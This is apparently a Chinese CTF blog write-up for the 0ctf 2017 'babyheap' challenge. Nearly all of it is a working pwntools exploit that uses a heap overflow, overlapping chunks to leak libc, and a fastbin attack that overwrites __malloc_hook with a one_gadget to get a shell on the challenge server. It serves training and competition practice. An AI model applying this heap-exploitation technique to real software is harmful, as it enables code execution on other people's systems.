0ctf_2017_babyheap

2023-09-25 18:16:21

0ctf_2017_babyheap

查看保护

edit可以改size，堆溢出，overlapping泄露libc。fastbin attack改hook为onegadget即可getshell。overlapping和fastbin的攻击手法具体看z1r0’s blog

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 27786)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'Command: '

def add(size):
    r.sendlineafter(menu, '1')
    r.sendlineafter('Size: ', str(size))

def edit(index, size, content):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Index: ', str(index))
    r.sendlineafter('Size: ', str(size))
    r.sendafter('Content: ', content)

def delete(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Index: ', str(index))

def show(index):
    r.sendlineafter(menu, '4')
    r.sendlineafter('Index: ', str(index))

add(0x10)   #0
add(0x40)   #1
add(0x30)   #2
add(0x10)   #3

p1 = b'a' * 0x18 + p64(0x91)
edit(0, len(p1), p1)

delete(1)

add(0x40)
show(2)

malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 88 - 0x10
success('malloc_hook = ' + hex(malloc_hook))

libc = ELF('./libc-2.23.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
one = [0x45216, 0x4526a, 0xf03a4, 0xf1247]
one_gadget = one[1] + libc_base

add(0x30)   #4

add(0x60)   #5
add(0x10)   #6

delete(5)
p2 = b'a' * 0x18 + p64(0x71) + p64(malloc_hook - 0x23)
edit(3, len(p2), p2)

add(0x60)
add(0x60)   #7

p3 = b'\0' * 0x13 + p64(one_gadget)
edit(7, len(p3), p3)

add(0x10)

r.interactive()

码农公寓

0ctf_2017_babyheap

相关文章